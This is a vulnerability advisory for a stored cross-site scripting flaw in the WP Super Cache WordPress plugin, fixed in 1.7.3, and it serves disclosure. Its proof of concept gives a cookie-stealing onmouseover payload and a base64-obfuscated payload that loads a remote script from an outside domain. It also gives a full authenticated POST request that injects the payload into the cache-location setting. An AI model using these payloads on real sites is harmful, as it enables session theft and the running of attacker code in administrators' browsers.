WordPress Plugin Vulnerabilities
WP Super Cache < 1.7.3 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not properly sanitise its wp_cache_location parameter in its settings, which could lead to a Stored Cross-Site Scripting issue.
Proof of Concept
### -- [ Payloads: ] [$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; [$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; ### -- [ PoC | Authenticated Persistent XSS | Cache Location: ] [!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 773 Cookie: [admin cookies] _wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023
Affects Plugins
Fixed in version 1.7.3
References
Classification
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-12 (about 1 years ago)
Added
2021-05-17 (about 1 years ago)
Last Updated
2021-05-24 (about 1 years ago)